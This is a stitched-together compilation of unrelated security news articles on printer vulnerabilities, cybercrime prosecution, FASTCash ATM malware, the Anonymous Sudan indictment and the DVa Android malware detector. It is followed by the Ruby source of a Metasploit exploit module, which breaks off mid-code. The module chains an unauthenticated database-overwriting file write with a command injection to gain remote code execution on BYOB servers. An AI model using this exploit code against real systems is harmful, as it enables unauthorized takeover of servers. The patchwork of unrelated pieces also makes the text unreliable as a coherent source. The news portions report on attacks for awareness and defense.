The shift to a distributed work model has exposed organizations to new threats, and a low but continuing stream of printer-related vulnerabilities isn't helping.

Source: Magnetic Mcc via Shutterstock

The shift to hybrid work models has exposed new vulnerabilities in corporate print infrastructure and heightened security risks at many organizations.

The risks run the gamut and include employees using insecure and unmanaged printers, remote workers sending print jobs over public networks, inadequate user authentication and print job release processes, exposed local spools and caches, and inconsistent patching practices.

A relatively low but steady volume of print-related vulnerabilities have exacerbated these issues. Recent examples of such vulnerabilities include CVE-2024-38199 (a remote code execution \[RCE\] vulnerability in the Windows or Line Printer Daemon \[LPD\] Service), CVE-2024-21433 (a Windows Print Spooler elevation of privilege vulnerability), and CVE-2024-43529 (a similar vulnerability that Microsoft disclosed in its October security update). The threats are certainly not Windows-specific, either. Recently, researchers discovered a set of potentially severe flaws in Common Unix Printing System (CUPS), a legacy protocol largely used in Linux, Unix, and heterogeneous environments.

Though few of these flaws have presented as major a threat as the PrintNightmare RCE flaw from 2021 in the Windows Print Spooler service, they have complicated the challenge of managing modern print infrastructure. Attackers, including nation-state actors, have sometimes abused printer software vulnerabilities — like CVE-2022-38028 — to substantial effect in their campaigns.

**Increase in Printer-Related Breaches**

The trends have driven an increase in print-related data breaches. A recent study that Quocirca conducted found that 67% of respondents experienced a printer-related security incident in 2024, compared with 61% last year. Small and mid-market organizations fared worse, with three-quarters (74%) reporting a printer-related data loss incident. Thirty-three percent pointed to unmanaged, employee-owned printers as a major security concern, and 29% identified vulnerabilities in office printing environments as presenting a major risk. More than a quarter (28%) identified their biggest printer related security challenge as protecting sensitive and confidential information.

Casey Ellis, founder and chief strategy officer at Bugcrowd, says the takeaway for organizations is that print security needs to be priority for decision makers. "Printer and print servers are an excellent place to establish persistence and gain business intelligence on a target," he says. The CUPS vulnerabilities showed that old, unused printer software can still represent a significant attack surface, especially for internal attacks and lateral movement.

Unfortunately, many organizations might be underestimating the risks or overlooking them altogether. And the shift to cloud/hybrid print environments have made printer infrastructure even more of an invisible issue from a vulnerability management standpoint, Ellis notes. "Let’s be real — the list of people who spend their days thinking about or even interacting with printers is a pretty small one," he says. "If your vulnerability management process allows out-of-sight, out-of-mind to dictate priority, it’s easy to miss \[printer security risks\]," he says.

The main takeaway is a general one, Ellis says: "Organizations need to remain diligent about their asset inventory and overall attack surface and ensure that they have a process for evaluating the risk."

**Printers, an Underestimated Risk?**

The legacy nature of many printer service environments is another issue, because vulnerabilities can sometimes exist undetected on them for years. Often, these printer environments lack the kind of monitoring tools that are available on other endpoint systems, making them a big target for attackers.

Often flaws are introduced into organizations' print infrastructure because print services are on by default and administrators are not aware of this, says Tom Boyer, director of security at Automox. "This means that this risk will go unseen for years and adversaries use that to their advantage," he notes. "They often know more about the target environment than the company themselves."

The Quocirca survey found security to be the top barrier to adoption of cloud print services as well.

"Although many organizations believe the cloud is more secure than an on-premise environment, security concerns remain a critical barrier to cloud print adoption," says Nicole Heinsler, chief engineer of security and device management at Xerox. "Overall, there is a disconnect between providers and clients on how the cloud can improve security by managing zero-day threats more effectively, and how data sovereignty can be more easily managed through cloud policies."

**Cloud Printing Cyber-Risks**

The survey found that many organizations view resting data — such as print jobs waiting in a queue and documents uploaded to the cloud print service — as a primary risk, Heinsler says: "This is why incorporating zero-trust principles in your cloud print infrastructure, such as authentication and access control, monitoring, detection, remediation, data and document protection, encryption, and automation, is so imperative."

One way to centralize print management infrastructure is to use cloud print options that deploy a native cloud architecture, rather than to attempt a "lift-and-shift" of traditional on-premises server architecture to a private cloud, she notes. The challenges organizations face will depend on the level of customization their applications have.

"For example, if they use standard print protocols, there's often little issue with \[cloud\] integration," Heinsler says. "\[But\] specific applications should be subjected to proof of concept before full enterprise deployment."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Hybrid Work Exposes New Vulnerabilities in Print Security

Challenges with cybercrime prosecution are making it easier for attackers to act with impunity. Law enforcement needs to catch up.

Source: Tero Vesalainen via Alamy Stock Photo

COMMENTARY

Historically, cybercriminals have always had an edge over law enforcement. It may take a few hours to steal thousands of credit cards after exploiting a SQL injection flaw, but the subsequent investigation and prosecution of the cybercriminals can take years — and still fail.

Europol described the challenges in investigating and prosecuting cybercrime — the collection and preservation of digital evidence, difficulty tracing and identifying attackers, and legal and judicial hurdles associated with cross-border investigations — back in 2019. These challenges remain relevant in 2024.

**Challenges That Law Enforcement Faces**

While many countries have one or more specialized law enforcement agencies (LEAs) or police units capable of investigating cybercrime, the general trend is to commingle computer-enabled crimes (cybercrimes) with cyberattacks and send them all to a single agency.

Cybercrimes, which include online dating scams and other types of digital fraud that rely on social engineering, cause damages ranging from 100 to several thousand dollars. Compare that with cyberattacks — which require fairly advanced tech skills and resources from cyber gangs — such as ransomware attacks on critical national infrastructure and advanced persistent threats aimed at stealthily stealing valuable trade secrets from large companies or classified information from governmental agencies. When a single agency is tasked with handling all types of digital crimes, it is unsurprising that just the initial triage of incoming cases can consume virtually all agency resources.

In contrast to overwhelmed LEAs dealing with all kinds of tasks simultaneously using extremely modest resources, modern cyber gangs usually have narrow specializations, such as vulnerability research and exploit development, where they truly excel technically and financially. Cyber mercenaries may use breached LEAs as proxies to attack other systems and slow down investigations, while state-backed groups may exploit backdoored LEAs for perfidious attacks trying to frame their political enemies. On the Dark Web, the number of announcements selling access to backdoored LEA systems or networks is steadily growing.

Despite national security being a hot topic for lawmakers on both sides of the Atlantic — and the increased funding that attention brings — specialized LEAs or units dedicated to tackling cybercrime still remain underfunded compared to their highly sophisticated, extraordinarily well-prepared, and well-funded adversaries.

Insufficient funding makes it harder to attract talented individuals to work on defense. In Western countries, state agencies struggle to compete with the deep-pocketed private sector for talented cybersecurity professionals, who can be swayed by perks unavailable to most government employees, such as higher salaries, longer leaves, and working from home. The situation is even worse in other countries: Young graduates with good technical skills can earn their annual salaries in a couple of weeks working for cybercrime conglomerates that actively prospect and recruit new members. In January 2024, FBI director Christopher Wray estimated that the number of hackers in China outnumbers all available FBI cyber personnel by at least 50 to 1.

Likewise, forensic tools and special equipment designed to bypass encryption on mobile devices or acquire digital evidence from a multicloud environment are also quite expensive, oftentimes being affordable only to leading national agencies or central forensic labs that serve thousands of requests from an entire country. As a result, a backlog of cybercrime investigations is building relentlessly, undermining people's trust in their government's capacity to protect their privacy and property on the Internet.

**Advantages for the Cyber Gangs**

International collaboration and judicial assistance in cybercrime investigation has never been simple. The Budapest Convention of 2001 is probably the most important international treaty designed to combat cross-border cybercrime. But even after the enactment of the Second Additional Protocol, the convention has fallen short of its original goals for political and organizational reasons. The recently proposed UN Treaty on Cybercrime is unlikely to do much better amid the unfolding geopolitical crises and the weakening force of international law.

The problem is that some countries, even after ratifying a treaty, are very selective when complying with the underlying duties and obligations owed to other signatories. They frequently ignore or simply delay required actions to the extent that, by the time they're finally performed, they are worthless — for instance, seizing volatile digital evidence several years after receiving a mutual legal assistance (MLAT) request from another sovereign state.

Indeed, some countries are considered safe harbors for cyber gangs that cooperate with, or work for, the government. These barons enjoy a luxurious lifestyle, safe in the knowledge that they will never be prosecuted domestically, let alone extradited, for cybercrimes that do not conflict with state public policy. Such cybercrime havens create a strong feeling of impunity among perpetrators, who believe — usually accurately — that they are above the law. Even if they are apprehended, cybercriminals usually get lenient punishments for the financial damage caused, compared to the decades-long and even life sentences for leaders of drug cartels or masterminds of Ponzi schemes.

Alarmingly, as the World Economic Forum reports, cybercrime has started to merge with organized and violent crime — for example, exploiting forced labor to staff large-scale online fraud and extortion campaigns.

**How Law Enforcement Can Make Up Ground**

To win against the seemingly invincible cybercrime hydra, governments should better organize their national cybercrime LEAs. Here's what they need to do:

*   Create specialization and internal segmentation.
    
*   Allocate additional funding to these agencies.
    
*   Form more public-private partnerships to jointly trace and dismantle cyber gangs.
    
*   Revise national legislation, including sentencing guidelines, for cybercrimes to boost the deterrence effect.
    

Otherwise, in a few years, the Internet may become an uncontrollable zone of lawlessness and chaos, co-managed by rival cyber gangs.

For a longer version of this article, please contact the author.

**About the Author**

Partner, Platt Law

Dr. Ilia Kolochenko is a Swiss expert in cybersecurity, cybercrime investigation, and cyber law. He is also a lawyer admitted to the DC Bar in Washington, DC. His legal practice is mainly focused on data protection, privacy, and cybersecurity law. Dr. Ilia Kolochenko currently serves as a Chief Architect and CEO at ImmuniWeb, a global application security company headquartered in Geneva, Switzerland. He is also a Partner & Cybersecurity Practice Lead at a US law firm with offices in New York and Washington. As part of his academic activities, Dr. Kolochenko is an Adjunct Professor of Cybersecurity Practice & Cyber Law at Capitol Technology University in Maryland, and a Faculty Member at the DC Bar Continuous Legal Education (CLE) Program, where he teaches a cybersecurity and privacy course for lawyers and other legal and judicial professionals.

Dr. Ilia Kolochenko has an LL.M. (Master of Laws) degree in Information Technology Law from the University of Edinburgh Law School, an M.Sc. in Criminal Justice (Cybercrime Investigations & Cybersecurity) from Boston University, and a Ph.D. in Computer Science from Capitol Technology University. He currently completes an advanced LL.M. in Cyber, Information and National Security (CINS) at George Mason University, Antonin Scalia Law School.

He is a Fellow of Information Privacy (FIP) and a Privacy Law Specialist (PLS) at the International Association of Privacy Professionals (IAPP), two most advanced credentials in privacy practice and privacy law by the IAPP, respectively, while also holding AIGP, CIPP/A, CIPP/C, CIPP/E, CIPP/US, CIPM, and CIPT privacy certifications. Additionally, he earned numerous offensive and defensive security certifications by the Global Information Assurance Certification (GIAC) after ongoing training in advanced cloud security, cyber operations, and investigations at SANS Institute.

Dr. Ilia Kolochenko currently serves a Vice-Chair of the Information Security Committee at the American Bar Association (ABA), also being a Fellow at the European Law Institute (ELI) and a Member of the Cybercrime Investigation & Cybersecurity (CIC) Center at Boston University. Additionally, Dr. Kolochenko is part of the Europol's Data Protection Experts Network (EDEN), INTERPOL's Digital Forensics Expert Group (DFEG), National Association of Criminal Defense Lawyers (NACDL), SANS CISO Network, and the EU CyberNet.

Dr. Ilia Kolochenko has authored over 75 articles on cybersecurity, computer crime investigations, cyber law, and artificial intelligence. His interviews and expert comments have been published in over 250 media across Europe and the US; he is also a frequent lecturer at cybersecurity, law enforcement, and legal conferences around the globe.

Cyber Gangs Aren't Afraid of Prosecution

North Korean hackers target Linux-based payment switches with new FASTCash malware, enabling ATM cashouts. Secure your financial infrastructure…

North Korean hackers target Linux-based payment switches with new FASTCash malware, enabling ATM cashouts. Secure your financial infrastructure and protect against these sophisticated attacks with expert cybersecurity solutions.

A new variant of the FASTCash malware, previously known to target Windows and AIX systems, has now been identified targeting Linux-based payment switches. 

FASTCash, first documented by U.S. CISA in 2018, has been linked to a series of ATM cashout schemes targeting banks in Africa and Asia since at least 2016, and has been developed by the notorious North Korean state-backed hacking group known as Lazarus (aka Hidden Cobra).

The malware operates by compromising payment switch servers, which are crucial components of a bank’s infrastructure responsible for processing card transactions. These systems handle the flow of transaction data between acquirers (the banks that enable merchants to accept payments), issuers (the banks that provide cards), and card networks like Visa and Mastercard. By targeting these payment switch servers, the malware disrupts the entire transaction process, making financial institutions vulnerable to fraud.

FASTCash for Linux uses Ubuntu Linux 22.04 (Focal Fossa), C++ programming language, AES-128 CBC encryption, and a hardcoded key to protect the configuration file.

A researcher, using the handle HaxRob, discovered two new samples of FASTCash for Linux switches in June 2023, one compiled for Ubuntu Linux 20.04 and likely developed after April 21, 2022, and the other likely not used. As of Sunday, only four anti-malware engines detected each sample.

HaxRob explains that the malware is present in the userspace of an interbank switch. When a compromised card is used for fraudulent translation, FASTCash manipulates messages received from issuers, causing transaction messages for denies to be converted to approvals.

The Linux variant of FASTCash is disguised as a shared object file named “libMyFc.so.” It specifically targets ISO 8583 messages – the standard format for communication within payment networks, intercepting declined transaction messages, typically triggered by insufficient funds, for a predetermined list of cardholder accounts. 

It then manipulates these messages, authorizing them for a random withdrawal amount in Turkish Lira, ranging from 12,000 to 30,000 Lira ($350 to $875). This modus operandi mirrors a Windows variant of FASTCash identified by the Cybersecurity and Infrastructure Security Agency (CISA) in September 2020.

For targeted transactions, the malware modifies the authorization response message by:

*   Removing specific data elements to avoid detection.
*   Overwriting the processing code to indicate approval.
*   Adding a random amount of Turkish Lira to the transaction amount.

Attack flow (Screenshot credit: Doubleagent.net

This expansion highlights the increasing sophistication and persistence of North Korean cyberattacks aimed at financial institutions and the need for enhanced security measures in payment switch systems.

Organizations should implement robust detection capabilities, regularly update software, configure security controls, patch and update systems, implement strong network security, conduct regular audits, and educate staff on phishing and social engineering risks to stay protected.

1.  **ATMJackpot Malware Stealing Cash From ATMs**
2.  **Cyber Criminals Selling Bitcoin ATM Malware on Dark Web**
3.  **ATM bombing suspect blew himself up while filming tutorial**
4.  **Card Skimmers and ATMs Used to Drain EBT Accounts in SoCal**
5.  **Prilex ATM Malware Modified to Clone Chip-and-Pin Payment Cards**

North Korean Hackers Deploy Linux FASTCash Malware for ATM Cashouts

The US has accused two brothers of being part of the hacker group Anonymous Sudan, which allegedly went on a wild cyberattack spree that hit hundreds of targets—and, for one of the two men, even put lives at risk.

For hackers seeking to maximize chaos, so-called denial-of-service attacks that knock targets offline with waves off junk traffic are typically more of a blunt cudgel than a weapon of mass destruction. But according to the US Department of Justice, a pair of Sudanese brothers allegedly behind the hacktivist group Anonymous Sudan launched a spree of those crude cyberattacks that was both powerful and cruel enough in its choice of victims—extending to dozens of hospitals in multiple countries, Israel’s missile alert system, and hundreds of other digital services—that one of them is now being charged not only with criminal hacking but also with the rare added allegation of seeking to cause physical injury and death.

On Wednesday the DOJ unsealed charges against brothers Ahmed and Alaa Omer, who allegedly launched a punishing bombardment of more than 35,000 distributed denial-of-service, or DDoS, attacks against hundreds of organizations, taking down websites and other networked systems as part of both their own ideologically motivated hacktivism, as a means of extortion, or on behalf of clients of a cyberattack-for-hire service they ran for profit. According to US prosecutors and the FBI, their victims included Microsoft's Azure cloud services, OpenAI's ChatGPT, video game and media companies, airports, and even the Pentagon, the FBI, and the Department of Justice itself.

In image of Ahmed Omer’s passport released by the FBI.

“We declare cyber war on the United States,” Ahmed Omer posted in a message to Anonymous Sudan's Telegram channel in April of last year, according to the indictment. "The United States will be our primary target.”

Anonymous Sudan also targeted hospitals in the US, Denmark, Sweden, and India. In at least one case in February, prosecutors say, the attacks on Cedars-Sinai Health Systems in Los Angeles caused hours of downtime for health care services that diverted patients to other hospitals. In that Los Angeles incident, the Justice Department claims that one of the two hackers explicitly sought to cause potentially deadly harm.

“Bomb our hospitals in Gaza, we shut down yours too, eye for eye,” Ahmed Omer allegedly wrote on Telegram in the midst of the attack. As a result of those hospital attacks, prosecutors are bringing charges against Ahmed Ohmer that carry a potential life sentence, which prosecutors describe as the most severe criminal charges ever brought against a hacker accused of denial-of-service attacks.

In earlier cases, US authorities claim, the hackers used cyberattacks to disrupt Israel's Tzeva Adom or “Code Red” missile alert app, tearing the system offline in the midst of deadly rocket attacks by Hamas, including during Hamas's attacks on October 7th of last year.

An Anonymous Sudan image included in the FBI’s complaint against the Omer brothers.

“The actions taken by this group were callous and brazen,” Martin Estrada, a US attorney for the Central District of California and lead prosecutor in the case, told reporters in a conference call. “This group was motivated by their extremist ideology, essentially a Sudanese nationalist ideology.”

Despite publicizing its charges against the two men, Estrada declined to make clear the whereabouts of the two alleged hackers—though he noted that they are in custody. An FBI affidavit accompanying the indictment states that an FBI agent, Elliott Peterson, interviewed both of the Omer brothers and that Ahmed Omer admitted to being an Anonymous Sudan administrator.

Law enforcement agencies also appear to have carried out an operation to take down Anonymous Sudan's infrastructure in March of this year, which prevented the group from carrying out further attacks. The Telegram channel where the group boasted of its targeting and advertised its for-profit attack service went entirely silent around that time and has since ceased to exist. “Anonymous Sudan in name and in operation is effectively dead,” says Chad Seaman, a principal security researcher for tech firm Akamai and a member of Big Pipes, a working group focused on DDoS that closely tracked the group and collaborated with law enforcement in its investigation.

From mid-2023 until that takedown, Anonymous Sudan distinguished itself among self-proclaimed hacktivists with a series of shockingly large and high-profile DDoS attacks. In June of last year, for instance, it pummeled Microsoft's Azure cloud services for days, knocking it intermittently offline and demanding a million-dollar ransom to stop. It also repeatedly took down OpenAI's ChatGPT in December and wrote on Telegram that it was targeting the company due to the pro-Israeli posts of one of its employees.

Anonymous Sudan has at times, in fact, appeared to have formal or informal ties to anti-Israel forces: According to prosecutors, it launched disruptive cyberattacks that targeted Israel's Tzeva Adom missile alert system on October 7, 2023, in the midst of attacks by the militant wing of Hamas that killed nearly 1,200 Israelis. As Israel's ensuing bombardment and invasion of the Gaza strip killed tens of thousands of Palestinian civilians over the months that followed, Anonymous Sudan frequently described the motivation for its attacks in its Telegram posts as the defense of Palestinians.

In December of 2023, for instance, Anonymous Sudan took OpenAI's ChatGPT offline with a sustained series of DDoS attacks in response to the company's executive Tal Broda vocally supporting the Israel Defense Forces’ missile attacks in Gaza. “More! No mercy! IDF don't stop!” Broda had written on X over a photo of a devastated urban landscape in Gaza, and in another post denied the existence of Palestine.

“We will continue targeting ChatGPT until the genocide supporter, Tal Broda, is fired and ChatGPT stops having dehumanizing views of Palestinians," Anonymous Sudan responded in a Telegram post explaining its attacks on OpenAI.

Still, Anonymous Sudan's true goals haven't always seemed entirely ideological, Akamai's Seaman says. The group has also offered to sell access to its DDoS infrastructure to other hackers: Telegram posts from the group as recently as March offered the use of its DDoS service, known as Godzilla or Skynet, for $2,500 a month. That suggests that even its attacks that appeared to be politically motivated may have been intended, at least in part, as marketing for its moneymaking side, Seaman argues.

“They seem to have thought, ‘We can get involved, really put a hurting on people, and market this service at the same time,’” Seaman says. He notes that, in the group's anti-Israel, pro-Palestine focus following the October 7 attacks, “there’s definitely an ideological thread in there. But the way it weaved through the different victims is something that maybe only the perpetrators of the attack fully understand.”

At times, Anonymous Sudan also hit Ukrainian targets, seemingly partnering with pro-Russian hacker groups like Killnet. That led some in the cybersecurity community to suspect that Anonymous Sudan was, in fact, a Russia-linked operation using its Sudanese identity as a front, given Russia's history of using hacktivism as false flag. The charges against Ahmed and Alaa Omer suggest that the group was, instead, authentically Sudanese in origin. But aside from its name, the group doesn't appear to have any clear ties to the original Anonymous hacker collective, which has been largely inactive for the last decade.

Aside from its targeting and politics, the group has distinguished itself through a relatively novel and effective technical approach, Akamai's Seaman says: Its DDoS service was built by gaining access to hundreds or possibly even thousands of virtual private servers—often-powerful machines offered by cloud services companies—by renting them with fraudulent credentials. It then used those machines to launch so-called layer 7 attacks, overwhelming web servers with requests for websites, rather than the lower-level floods of raw internet data requests that DDoS hackers have tended to use in the past. Anonymous Sudan and the customers of its DDoS services would then target victims with vast numbers of those layer 7 requests in parallel, sometimes using techniques called “multiplexing” or “pipelining” to simultaneously create multiple bandwidth demands on servers until they dropped offline.

For at least nine months, the group's technical power and brazen, unpredictable targeting made it a top concern for the anti-DDoS community, Seaman says—and for its many victims. “There was a lot of uncertainty about this group, what they were capable of, what their motivations were, why they targeted people,” says Seaman. “When Anonymous Sudan went away, there was a spike in curiosity and definitely a sigh of relief.”

The Justice Department's decision to level a criminal charge against Ahmed Omer that could lead to a life sentence for a denial-of-service attack may seem haphazard, given that state-sponsored cyberattacks and ransomware have often caused far more serious damage to health care networks, says Josh Corman, a researcher at the Institute for Security and Technology who has long focused on health care-targeted hacking. Corman says he's nonetheless encouraged to see prosecutors recognize that even crude cyberattacks can have serious—and even lethal—effects on victims.

“Yes, denial-of-service attacks can degrade and deny patent care to cause loss of life,” says Corman. “While this is the first, and it may seem arbitrary until we get more details, it could be heartening to see that we understand the outsize consequences of these attacks.”

_Updated 5 pm ET, October 16, 2024: While Anonymous Sudan is accused of launching thousands of attacks, the number of targets was in the hundreds. We've updated the story to clarify that distinction._

Hacker Charged With Seeking to Kill Using Cyberattacks on Hospitals

Discover DVa, a new tool that detects and removes malware exploiting accessibility features on Android devices. Learn how…

Discover DVa, a new tool that detects and removes malware exploiting accessibility features on Android devices. Learn how this innovative solution helps protect users from malicious apps and safeguards their personal information.

While accessibility features have greatly enhanced the usability of smartphones for people with disabilities, they have also introduced new vulnerabilities that malicious actors can exploit. The latest research reveals that malware can leverage these features to gain unauthorized access and perform harmful actions, such as transferring funds, compromising personal data, and preventing uninstallation.

For your information, accessibility (A11y) refers to the design and development of products, services, and environments used by people with disabilities. Common accessibility features include screen readers, voice-to-text software, captioning, keyboard navigation, and color contrast.

Accessibility permissions, designed for apps to interact with screen content and perform actions like reading text or clicking buttons, can be abused by malicious apps to execute actions without user consent, leading to severe consequences.

Screenshot: Georgia Tech

****DVa: A New Tool for Protection****

Researchers at Georgia Tech have developed a cloud-based tool called **Detector of Victim-specific Accessibility (DVa)** (PDF)to combat this growing threat. DVa scans Android devices for malware that exploits accessibility features and provides detailed reports to users and security researchers.

DVa is a backend service that analyzes malware detected by security systems like Google Play Protect. It tricks the malware into revealing its targets and attack methods by mimicking potential victim apps and simulating accessibility events.

This helps identify specific apps targeted by the malware and unique ways it abuses accessibility features, providing users with information about detected malware, affected apps, targeted victims, and potential damages.

Users can take immediate action to uninstall malicious apps and protect their devices. DVa sends reports to Google, enabling the company to address the issue and remove **malicious apps from the Play Store**.

DVa malware analysis technique dynamically models victim-specific A11y information, allowing investigators to access live interaction between the malware and this information. Researchers used it to analyze **Cerberus malware** and discovered an unknown automatic transaction abuse vector targeting 12 new victims and 0-day dynamically loaded routines targeting 12 additional victims.

The growing reliance on accessibility features highlights the need to balance usability and security. As systems become more accessible, it’s crucial to implement security measures to prevent malicious exploitation. Tools like DVa that provide users with necessary information, can help mitigate risks associated with accessibility-exploiting malware, ensuring a safer mobile experience for all.

1.  **Best Paid and Free OSINT Tools for 2024**
2.  **New tool detects fake 4G cell phone towers**
3.  **Mockingbird AI Tool Detects Deepfake Audio with 90% accuracy**
4.  **Fake OnlyFans Checker Tool Infects Hackers with Lummac Stealer**
5.  **Kaspersky’s iShutdown Tool Detects Pegasus Spyware on iOS Devices**

New Tool DVa Detects and Removes Android Malware

This Metasploit module exploits two vulnerabilities in the BYOB (Build Your Own Botnet) web GUI. It leverages an unauthenticated arbitrary file write that allows modification of the SQLite database, adding a new admin user. It also uses an authenticated command injection in the payload generation page. These vulnerabilities remain unpatched.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'sqlite3'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'BYOB Unauthenticated RCE via Arbitrary File Write and Command Injection (CVE-2024-45256, CVE-2024-45257)',        'Description' => %q{          This module exploits two vulnerabilities in the BYOB (Build Your Own Botnet) web GUI:          1. CVE-2024-45256: Unauthenticated arbitrary file write that allows modification of the SQLite database, adding a new admin user.          2. CVE-2024-45257: Authenticated command injection in the payload generation page.          These vulnerabilities remain unpatched.        },        'Author' => [          'chebuya',          # Discoverer and PoC          'Valentin Lobstein' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-45256'],          ['CVE', '2024-45257'],          ['URL', 'https://blog.chebuya.com/posts/unauthenticated-remote-command-execution-on-byob/']        ],        'Platform' => %w[unix linux],        'Arch' => %w[ARCH_CMD],        'Targets' => [          [            'Unix/Linux Command Shell', {              'Platform' => %w[unix linux],              'Arch' => ARCH_CMD,              'Privileged' => true              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ]        ],        'DisclosureDate' => '2024-08-15',        'DefaultTarget' => 0,        'DefaultOptions' => { 'SRVPORT' => 5000 },        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [IOC_IN_LOGS],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    register_options(      [        OptString.new('USERNAME', [false, 'Username for new admin', 'admin']),        OptString.new('PASSWORD', [false, 'Password for new admin', nil])      ]    )  end  def primer    add_resource('Path' => '/', 'Proc' => proc { |cli, req| on_request_uri_payload(cli, req) })    print_status('Payload is ready at /')  end  def on_request_uri_payload(cli, request)    handle_request(cli, request, payload.encoded)  end  def handle_request(cli, request, response_payload)    print_status("Received request at: #{request.uri} - Client Address: #{cli.peerhost}")    case request.uri    when '/'      print_status("Sending response to #{cli.peerhost} for /")      send_response(cli, response_payload)    else      print_error("Request for unknown resource: #{request.uri}")      send_not_found(cli)    end  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path),      'keep_cookies' => true    })    if res      doc = res.get_html_document      unless doc.at('title')&.text&.include?('Build Your Own Botnet') || doc.at('meta[name="description"]')&.attr('content')&.include?('Build Your Own Botnet')        return CheckCode::Safe('The target does not appear to be BYOB.')      end    else      return CheckCode::Unknown('The target did not respond to the initial check.')    end    print_good('The target appears to be BYOB.')    random_data = Rex::Text.rand_text_alphanumeric(32)    random_filename = Rex::Text.rand_text_alphanumeric(16)    random_owner = Rex::Text.rand_text_alphanumeric(8)    random_module = Rex::Text.rand_text_alphanumeric(6)    random_session = Rex::Text.rand_text_alphanumeric(6)    form_data = {      'data' => random_data,      'filename' => random_filename,      'type' => 'txt',      'owner' => random_owner,      'module' => random_module,      'session' => random_session    }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api', 'file', 'add'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => form_data,      'keep_cookies' => true    })    if res&.code == 500      return CheckCode::Vulnerable    else      case res&.code      when 200        return CheckCode::Safe      when nil        return CheckCode::Unknown('The target did not respond.')      else        return CheckCode::Unknown("The target responded with HTTP status #{res.code}")      end    end  end  def get_csrf(path)    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, path),      'keep_cookies' => true    })    fail_with(Failure::UnexpectedReply, 'Could not retrieve CSRF token') unless res    csrf_token = res.get_html_document.at_xpath("//input[@name='csrf_token']/@value")&.text    fail_with(Failure::UnexpectedReply, 'CSRF token not found') if csrf_token.nil?    csrf_token  end  def register_user(username, password)    csrf_token = get_csrf('register')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'register'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'csrf_token' => csrf_token,        'username' => username,        'password' => password,        'confirm_password' => password,        'submit' => 'Sign Up'      },      'keep_cookies' => true    })    if res.nil?      fail_with(Failure::UnexpectedReply, 'No response from the server.')    elsif res.code == 302      print_good('Registered user!')    else      fail_with(Failure::UnexpectedReply, "User registration failed: #{res.code}")    end  end  def login_user(username, password)    csrf_token = get_csrf('login')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'login'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'csrf_token' => csrf_token,        'username' => username,        'password' => password,        'submit' => 'Log In'      },      'keep_cookies' => true    })    if res.nil?      fail_with(Failure::UnexpectedReply, 'No response from the server.')    elsif res.code == 302      print_good('Logged in successfully!')    else      fail_with(Failure::UnexpectedReply, "Login failed: #{res.code}")    end  end  def generate_malicious_db    mem_db = SQLite3::Database.new(':memory:')    mem_db.execute <<-SQL            CREATE TABLE user (            id INTEGER NOT NULL,            username VARCHAR(32) NOT NULL,            password VARCHAR(60) NOT NULL,            joined DATETIME NOT NULL,            bots INTEGER,            PRIMARY KEY (id),            UNIQUE (username)            );    SQL    mem_db.execute <<-SQL            CREATE TABLE session (            id INTEGER NOT NULL,            uid VARCHAR(32) NOT NULL,            online BOOLEAN NOT NULL,            joined DATETIME NOT NULL,            last_online DATETIME NOT NULL,            public_ip VARCHAR(42),            local_ip VARCHAR(42),            mac_address VARCHAR(17),            username VARCHAR(32),            administrator BOOLEAN,            platform VARCHAR(5),            device VARCHAR(32),            architecture VARCHAR(2),            latitude FLOAT,            longitude FLOAT,            new BOOLEAN NOT NULL,            owner VARCHAR(120) NOT NULL,            PRIMARY KEY (uid),            UNIQUE (uid),            FOREIGN KEY(owner) REFERENCES user (username)            );    SQL    mem_db.execute <<-SQL            CREATE TABLE payload (            id INTEGER NOT NULL,            filename VARCHAR(34) NOT NULL,            operating_system VARCHAR(3),            architecture VARCHAR(14),            created DATETIME NOT NULL,            owner VARCHAR(120) NOT NULL,            PRIMARY KEY (id),            UNIQUE (filename),            FOREIGN KEY(owner) REFERENCES user (username)            );    SQL    mem_db.execute <<-SQL            CREATE TABLE exfiltrated_file (            id INTEGER NOT NULL,            filename VARCHAR(4096) NOT NULL,            session VARCHAR(15) NOT NULL,            module VARCHAR(15) NOT NULL,            created DATETIME NOT NULL,            owner VARCHAR(120) NOT NULL,            PRIMARY KEY (id),            UNIQUE (filename),            FOREIGN KEY(owner) REFERENCES user (username)            );    SQL    mem_db.execute <<-SQL            CREATE TABLE task (            id INTEGER NOT NULL,            uid VARCHAR(32) NOT NULL,            task TEXT,            result TEXT,            issued DATETIME NOT NULL,            completed DATETIME,            session VARCHAR(32) NOT NULL,            PRIMARY KEY (id),            UNIQUE (uid),            FOREIGN KEY(session) REFERENCES session (uid)            );    SQL    base64_data = Tempfile.open('database.db') do |file|      src_db = SQLite3::Database.new(file.path)      backup = SQLite3::Backup.new(src_db, 'main', mem_db, 'main')      backup.step(-1)      backup.finish      binary_data = File.binread(file.path)      Rex::Text.encode_base64(binary_data)    end    base64_data  end  def upload_database_multiple_paths    successful_paths = []    filepaths = [      '/proc/self/cwd/buildyourownbotnet/database.db',      '/proc/self/cwd/../buildyourownbotnet/database.db',      '/proc/self/cwd/../../../../buildyourownbotnet/database.db',      '/proc/self/cwd/instance/database.db',      '/proc/self/cwd/../../../../instance/database.db',      